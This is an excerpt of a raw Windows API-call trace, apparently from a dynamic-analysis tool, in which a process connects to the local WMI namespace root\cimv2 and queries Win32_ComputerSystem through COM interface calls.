	[0267.196] WbemDefPath:IUnknown:Release (This=0x60950b0) returned 0x2
	[0267.197] WbemDefPath:IUnknown:Release (This=0x60950b0) returned 0x1
	[0267.197] CoGetContextToken (in: pToken=0x5fae860 | out: pToken=0x5fae860) returned 0x0
	[0267.197] CoGetContextToken (in: pToken=0x5fae820 | out: pToken=0x5fae820) returned 0x0
	[0267.197] WbemDefPath:IUnknown:AddRef (This=0x60950b0) returned 0x2
	[0267.197] WbemDefPath:IUnknown:QueryInterface (in: This=0x60950b0, riid=0x5fae89c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae898 | out: ppvObject=0x5fae898*=0x60950b0) returned 0x0
	[0267.197] WbemDefPath:IUnknown:Release (This=0x60950b0) returned 0x2
	[0267.197] WbemDefPath:IUnknown:AddRef (This=0x60950b0) returned 0x3
	[0267.197] WbemDefPath:IWbemPath:SetText (This=0x60950b0, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.197] WbemDefPath:IUnknown:Release (This=0x60950b0) returned 0x2
	[0267.198] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60950b0, puCount=0x5faea04 | out: puCount=0x5faea04*=0x2) returned 0x0
	[0267.198] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5faea00*=0x0, pszText=0x0 | out: puBuffLength=0x5faea00*=0x17, pszText=0x0) returned 0x0
	[0267.198] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5faea00*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea00*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.198] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60950b0, puCount=0x5faea00 | out: puCount=0x5faea00*=0x2) returned 0x0
	[0267.198] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5fae9fc*=0x0, pszText=0x0 | out: puBuffLength=0x5fae9fc*=0x17, pszText=0x0) returned 0x0
	[0267.198] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5fae9fc*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae9fc*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.198] CoGetObjectContext (in: riid=0x2b5ad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae97c | out: ppv=0x5fae97c*=0x4a8dec) returned 0x0
	[0267.198] IComThreadingInfo:GetCurrentApartmentType (in: This=0x4a8dec, pAptType=0x5fae974 | out: pAptType=0x5fae974*=1) returned 0x0
	[0267.198] IUnknown:QueryInterface (in: This=0x4a8dec, riid=0x2b5ace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5fae978 | out: ppvObject=0x5fae978*=0x0) returned 0x80004002
	[0267.198] IUnknown:Release (This=0x4a8dec) returned 0x1
	[0267.198] CoGetClassObject (in: rclsid=0x556acc*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae7cc | out: ppv=0x5fae7cc*=0x608dcc8) returned 0x0
	[0267.199] WbemLocator:IUnknown:QueryInterface (in: This=0x608dcc8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fae5fc | out: ppvObject=0x5fae5fc*=0x0) returned 0x80004002
	[0267.199] WbemLocator:IClassFactory:CreateInstance (in: This=0x608dcc8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae634 | out: ppvObject=0x5fae634*=0x608dee8) returned 0x0
	[0267.199] WbemLocator:IUnknown:QueryInterface (in: This=0x608dee8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3d8 | out: ppvObject=0x5fae3d8*=0x608dee8) returned 0x0
	[0267.199] WbemLocator:IUnknown:QueryInterface (in: This=0x608dee8, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fae394 | out: ppvObject=0x5fae394*=0x0) returned 0x80004002
	[0267.200] WbemLocator:IUnknown:AddRef (This=0x608dee8) returned 0x3
	[0267.200] CoGetContextToken (in: pToken=0x5fae220 | out: pToken=0x5fae220) returned 0x0
	[0267.200] WbemLocator:IUnknown:QueryInterface (in: This=0x608dee8, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae208 | out: ppvObject=0x5fae208*=0x0) returned 0x80004002
	[0267.200] CoGetContextToken (in: pToken=0x5fae218 | out: pToken=0x5fae218) returned 0x0
	[0267.200] WbemLocator:IUnknown:AddRef (This=0x608dee8) returned 0x4
	[0267.200] WbemLocator:IUnknown:QueryInterface (in: This=0x608dee8, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae28c | out: ppvObject=0x5fae28c*=0x0) returned 0x80004002
	[0267.200] WbemLocator:IUnknown:Release (This=0x608dee8) returned 0x3
	[0267.200] WbemLocator:IUnknown:Release (This=0x608dee8) returned 0x2
	[0267.201] WbemLocator:IUnknown:Release (This=0x608dcc8) returned 0x0
	[0267.201] WbemLocator:IUnknown:Release (This=0x608dee8) returned 0x1
	[0267.201] CoGetContextToken (in: pToken=0x5fae724 | out: pToken=0x5fae724) returned 0x0
	[0267.201] CoGetContextToken (in: pToken=0x5fae6e4 | out: pToken=0x5fae6e4) returned 0x0
	[0267.201] WbemLocator:IUnknown:AddRef (This=0x608dee8) returned 0x2
	[0267.201] WbemLocator:IUnknown:QueryInterface (in: This=0x608dee8, riid=0x5fae760*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5fae75c | out: ppvObject=0x5fae75c*=0x608dee8) returned 0x0
	[0267.201] WbemLocator:IUnknown:Release (This=0x608dee8) returned 0x2
	[0267.201] WbemLocator:IUnknown:Release (This=0x608dee8) returned 0x1
	[0267.201] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60950b0, puCount=0x5fae954 | out: puCount=0x5fae954*=0x2) returned 0x0
	[0267.202] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=8, puBuffLength=0x5fae950*=0x0, pszText=0x0 | out: puBuffLength=0x5fae950*=0x17, pszText=0x0) returned 0x0
	[0267.202] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=8, puBuffLength=0x5fae950*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae950*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.202] CoCreateInstance (in: rclsid=0x6a3113a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6a3112d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x5fae42c | out: ppv=0x5fae42c*=0x608def8) returned 0x0
	[0267.202] WbemLocator:IWbemLocator:ConnectServer (in: This=0x608def8, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x5fae478 | out: ppNamespace=0x5fae478*=0x608e99c) returned 0x0
	[0267.257] WbemLocator:IUnknown:QueryInterface (in: This=0x608e99c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae348 | out: ppvObject=0x5fae348*=0x58758c) returned 0x0
	[0267.257] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x58758c, pProxy=0x608e99c, pAuthnSvc=0x5fae390, pAuthzSvc=0x5fae38c, pServerPrincName=0x5fae39c, pAuthnLevel=0x5fae394, pImpLevel=0x5fae380, pAuthInfo=0x5fae384, pCapabilites=0x5fae388 | out: pAuthnSvc=0x5fae390*=0xa, pAuthzSvc=0x5fae38c*=0x0, pServerPrincName=0x5fae39c, pAuthnLevel=0x5fae394*=0x6, pImpLevel=0x5fae380*=0x2, pAuthInfo=0x5fae384, pCapabilites=0x5fae388*=0x1) returned 0x0
	[0267.257] WbemLocator:IUnknown:Release (This=0x58758c) returned 0x1
	[0267.257] WbemLocator:IUnknown:QueryInterface (in: This=0x608e99c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae33c | out: ppvObject=0x5fae33c*=0x5875ac) returned 0x0
	[0267.257] WbemLocator:IUnknown:QueryInterface (in: This=0x608e99c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae338 | out: ppvObject=0x5fae338*=0x58758c) returned 0x0
	[0267.257] WbemLocator:IClientSecurity:SetBlanket (This=0x58758c, pProxy=0x608e99c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0267.258] WbemLocator:IUnknown:Release (This=0x58758c) returned 0x2
	[0267.258] WbemLocator:IUnknown:Release (This=0x5875ac) returned 0x1
	[0267.258] CoTaskMemFree (pv=0x5863e8) 
	[0267.258] WbemLocator:IUnknown:Release (This=0x608def8) returned 0x0
	[0267.258] WbemLocator:IUnknown:QueryInterface (in: This=0x608e99c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadcf8 | out: ppvObject=0x5fadcf8*=0x5875ac) returned 0x0
	[0267.258] WbemLocator:IUnknown:QueryInterface (in: This=0x5875ac, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadcb4 | out: ppvObject=0x5fadcb4*=0x0) returned 0x80004002
	[0267.259] WbemLocator:IUnknown:QueryInterface (in: This=0x5875ac, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fadba8 | out: ppvObject=0x5fadba8*=0x0) returned 0x80004002
	[0267.260] WbemLocator:IUnknown:AddRef (This=0x5875ac) returned 0x3
	[0267.260] CoGetContextToken (in: pToken=0x5fadb40 | out: pToken=0x5fadb40) returned 0x0
	[0267.260] WbemLocator:IUnknown:QueryInterface (in: This=0x5875ac, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadb28 | out: ppvObject=0x5fadb28*=0x58750c) returned 0x0
	[0267.260] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x58750c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadb30 | out: pCid=0x5fadb30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0267.260] WbemLocator:IUnknown:Release (This=0x58750c) returned 0x3
	[0267.260] CoGetContextToken (in: pToken=0x5fadb38 | out: pToken=0x5fadb38) returned 0x0
	[0267.260] WbemLocator:IUnknown:AddRef (This=0x5875ac) returned 0x4
	[0267.260] WbemLocator:IUnknown:QueryInterface (in: This=0x5875ac, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadbac | out: ppvObject=0x5fadbac*=0x587594) returned 0x0
	[0267.261] WbemLocator:IUnknown:Release (This=0x5875ac) returned 0x4
	[0267.261] WbemLocator:IRpcOptions:Query (in: This=0x587594, pPrx=0x5875ac, dwProperty=2, pdwValue=0x5fadbd0 | out: pdwValue=0x5fadbd0) returned 0x80004002
	[0267.261] WbemLocator:IUnknown:Release (This=0x587594) returned 0x3
	[0267.261] WbemLocator:IUnknown:Release (This=0x5875ac) returned 0x2
	[0267.261] CoGetContextToken (in: pToken=0x5fadfac | out: pToken=0x5fadfac) returned 0x0
	[0267.261] CoGetContextToken (in: pToken=0x5fadf6c | out: pToken=0x5fadf6c) returned 0x0
	[0267.261] WbemLocator:IUnknown:AddRef (This=0x5875ac) returned 0x3
	[0267.261] WbemLocator:IUnknown:QueryInterface (in: This=0x5875ac, riid=0x5fadfe8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5fadfe4 | out: ppvObject=0x5fadfe4*=0x608e99c) returned 0x0
	[0267.262] WbemLocator:IUnknown:Release (This=0x5875ac) returned 0x3
	[0267.262] WbemLocator:IUnknown:Release (This=0x608e99c) returned 0x2
	[0267.262] WbemLocator:IUnknown:Release (This=0x608e99c) returned 0x1
	[0267.262] CoGetContextToken (in: pToken=0x5fae8c8 | out: pToken=0x5fae8c8) returned 0x0
	[0267.262] WbemLocator:IUnknown:AddRef (This=0x5875ac) returned 0x2
	[0267.262] WbemLocator:IUnknown:QueryInterface (in: This=0x5875ac, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae4ec | out: ppvObject=0x5fae4ec*=0x5875ac) returned 0x0
	[0267.262] WbemLocator:IUnknown:Release (This=0x5875ac) returned 0x2
	[0267.263] WbemLocator:IUnknown:Release (This=0x5875ac) returned 0x1
	[0267.263] CoGetContextToken (in: pToken=0x5fae0cc | out: pToken=0x5fae0cc) returned 0x0
	[0267.263] CoGetContextToken (in: pToken=0x5fae08c | out: pToken=0x5fae08c) returned 0x0
	[0267.263] WbemLocator:IUnknown:AddRef (This=0x5875ac) returned 0x2
	[0267.263] WbemLocator:IUnknown:QueryInterface (in: This=0x5875ac, riid=0x5fae108*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5fae104 | out: ppvObject=0x5fae104*=0x608e99c) returned 0x0
	[0267.263] WbemLocator:IUnknown:Release (This=0x5875ac) returned 0x2
	[0267.263] WbemLocator:IUnknown:AddRef (This=0x608e99c) returned 0x3
	[0267.263] IWbemServices:ExecQuery (in: This=0x608e99c, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x5fae710 | out: ppEnum=0x5fae710*=0x608ea3c) returned 0x0
	[0267.271] IUnknown:QueryInterface (in: This=0x608ea3c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3bc | out: ppvObject=0x5fae3bc*=0x608ea40) returned 0x0
	[0267.271] IClientSecurity:QueryBlanket (in: This=0x608ea40, pProxy=0x608ea3c, pAuthnSvc=0x5fae404, pAuthzSvc=0x5fae400, pServerPrincName=0x5fae410, pAuthnLevel=0x5fae408, pImpLevel=0x5fae3f4, pAuthInfo=0x5fae3f8, pCapabilites=0x5fae3fc | out: pAuthnSvc=0x5fae404*=0xa, pAuthzSvc=0x5fae400*=0x0, pServerPrincName=0x5fae410, pAuthnLevel=0x5fae408*=0x6, pImpLevel=0x5fae3f4*=0x2, pAuthInfo=0x5fae3f8, pCapabilites=0x5fae3fc*=0x1) returned 0x0
	[0267.271] IUnknown:Release (This=0x608ea40) returned 0x1
	[0267.271] IUnknown:QueryInterface (in: This=0x608ea3c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3b0 | out: ppvObject=0x5fae3b0*=0x5874bc) returned 0x0
	[0267.272] IUnknown:QueryInterface (in: This=0x608ea3c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3ac | out: ppvObject=0x5fae3ac*=0x608ea40) returned 0x0
	[0267.272] IClientSecurity:SetBlanket (This=0x608ea40, pProxy=0x608ea3c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0267.274] IUnknown:Release (This=0x608ea40) returned 0x2
	[0267.274] WbemLocator:IUnknown:Release (This=0x5874bc) returned 0x1
	[0267.274] CoTaskMemFree (pv=0x586388) 
	[0267.274] WbemLocator:IUnknown:Release (This=0x608e99c) returned 0x2
	[0267.274] IUnknown:QueryInterface (in: This=0x608ea3c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadd68 | out: ppvObject=0x5fadd68*=0x5874bc) returned 0x0
	[0267.274] WbemLocator:IUnknown:QueryInterface (in: This=0x5874bc, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadd24 | out: ppvObject=0x5fadd24*=0x0) returned 0x80004002
	[0267.275] WbemLocator:IUnknown:QueryInterface (in: This=0x5874bc, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fadc18 | out: ppvObject=0x5fadc18*=0x0) returned 0x80004002
	[0267.276] WbemLocator:IUnknown:AddRef (This=0x5874bc) returned 0x3
	[0267.276] CoGetContextToken (in: pToken=0x5fadbb0 | out: pToken=0x5fadbb0) returned 0x0
	[0267.276] WbemLocator:IUnknown:QueryInterface (in: This=0x5874bc, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadb98 | out: ppvObject=0x5fadb98*=0x58741c) returned 0x0
	[0267.276] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x58741c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadba0 | out: pCid=0x5fadba0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0267.276] WbemLocator:IUnknown:Release (This=0x58741c) returned 0x3
	[0267.276] CoGetContextToken (in: pToken=0x5fadba8 | out: pToken=0x5fadba8) returned 0x0
	[0267.276] WbemLocator:IUnknown:AddRef (This=0x5874bc) returned 0x4
	[0267.276] WbemLocator:IUnknown:QueryInterface (in: This=0x5874bc, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadc1c | out: ppvObject=0x5fadc1c*=0x5874a4) returned 0x0
	[0267.277] WbemLocator:IUnknown:Release (This=0x5874bc) returned 0x4
	[0267.277] WbemLocator:IRpcOptions:Query (in: This=0x5874a4, pPrx=0x5874bc, dwProperty=2, pdwValue=0x5fadc40 | out: pdwValue=0x5fadc40) returned 0x80004002
	[0267.277] WbemLocator:IUnknown:Release (This=0x5874a4) returned 0x3
	[0267.277] WbemLocator:IUnknown:Release (This=0x5874bc) returned 0x2
	[0267.277] CoGetContextToken (in: pToken=0x5fae01c | out: pToken=0x5fae01c) returned 0x0
	[0267.277] CoGetContextToken (in: pToken=0x5fadfdc | out: pToken=0x5fadfdc) returned 0x0
	[0267.277] WbemLocator:IUnknown:AddRef (This=0x5874bc) returned 0x3
	[0267.277] WbemLocator:IUnknown:QueryInterface (in: This=0x5874bc, riid=0x5fae058*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae054 | out: ppvObject=0x5fae054*=0x608ea3c) returned 0x0
	[0267.277] WbemLocator:IUnknown:Release (This=0x5874bc) returned 0x3
	[0267.278] IUnknown:Release (This=0x608ea3c) returned 0x2
	[0267.278] IUnknown:Release (This=0x608ea3c) returned 0x1
	[0267.278] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60950b0, puCount=0x5fae9a8 | out: puCount=0x5fae9a8*=0x2) returned 0x0
	[0267.278] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5fae9a4*=0x0, pszText=0x0 | out: puBuffLength=0x5fae9a4*=0x17, pszText=0x0) returned 0x0
	[0267.278] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5fae9a4*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae9a4*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.278] CoGetContextToken (in: pToken=0x5fae344 | out: pToken=0x5fae344) returned 0x0
	[0267.278] CoGetContextToken (in: pToken=0x5fae304 | out: pToken=0x5fae304) returned 0x0
	[0267.278] WbemLocator:IUnknown:AddRef (This=0x5874bc) returned 0x2
	[0267.278] WbemLocator:IUnknown:QueryInterface (in: This=0x5874bc, riid=0x5fae380*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae37c | out: ppvObject=0x5fae37c*=0x608ea3c) returned 0x0
	[0267.279] WbemLocator:IUnknown:Release (This=0x5874bc) returned 0x2
	[0267.279] IUnknown:AddRef (This=0x608ea3c) returned 0x3
	[0267.279] IEnumWbemClassObject:Clone (in: This=0x608ea3c, ppEnum=0x5fae978 | out: ppEnum=0x5fae978*=0x608eb04) returned 0x0
	[0267.280] IUnknown:QueryInterface (in: This=0x608eb04, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae634 | out: ppvObject=0x5fae634*=0x608eb08) returned 0x0
	[0267.280] IClientSecurity:QueryBlanket (in: This=0x608eb08, pProxy=0x608eb04, pAuthnSvc=0x5fae67c, pAuthzSvc=0x5fae678, pServerPrincName=0x5fae688, pAuthnLevel=0x5fae680, pImpLevel=0x5fae66c, pAuthInfo=0x5fae670, pCapabilites=0x5fae674 | out: pAuthnSvc=0x5fae67c*=0xa, pAuthzSvc=0x5fae678*=0x0, pServerPrincName=0x5fae688, pAuthnLevel=0x5fae680*=0x6, pImpLevel=0x5fae66c*=0x2, pAuthInfo=0x5fae670, pCapabilites=0x5fae674*=0x1) returned 0x0
	[0267.280] IUnknown:Release (This=0x608eb08) returned 0x1
	[0267.280] IUnknown:QueryInterface (in: This=0x608eb04, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae628 | out: ppvObject=0x5fae628*=0x58778c) returned 0x0
	[0267.280] IUnknown:QueryInterface (in: This=0x608eb04, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae624 | out: ppvObject=0x5fae624*=0x608eb08) returned 0x0
	[0267.281] IClientSecurity:SetBlanket (This=0x608eb08, pProxy=0x608eb04, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0267.283] IUnknown:Release (This=0x608eb08) returned 0x2
	[0267.283] WbemLocator:IUnknown:Release (This=0x58778c) returned 0x1
	[0267.283] CoTaskMemFree (pv=0x5863e8) 
	[0267.283] IUnknown:Release (This=0x608ea3c) returned 0x2
	[0267.283] IUnknown:QueryInterface (in: This=0x608eb04, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadfd0 | out: ppvObject=0x5fadfd0*=0x58778c) returned 0x0
	[0267.283] WbemLocator:IUnknown:QueryInterface (in: This=0x58778c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadf8c | out: ppvObject=0x5fadf8c*=0x0) returned 0x80004002
	[0267.284] WbemLocator:IUnknown:QueryInterface (in: This=0x58778c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fade80 | out: ppvObject=0x5fade80*=0x0) returned 0x80004002
	[0267.284] WbemLocator:IUnknown:AddRef (This=0x58778c) returned 0x3
	[0267.284] CoGetContextToken (in: pToken=0x5fade18 | out: pToken=0x5fade18) returned 0x0
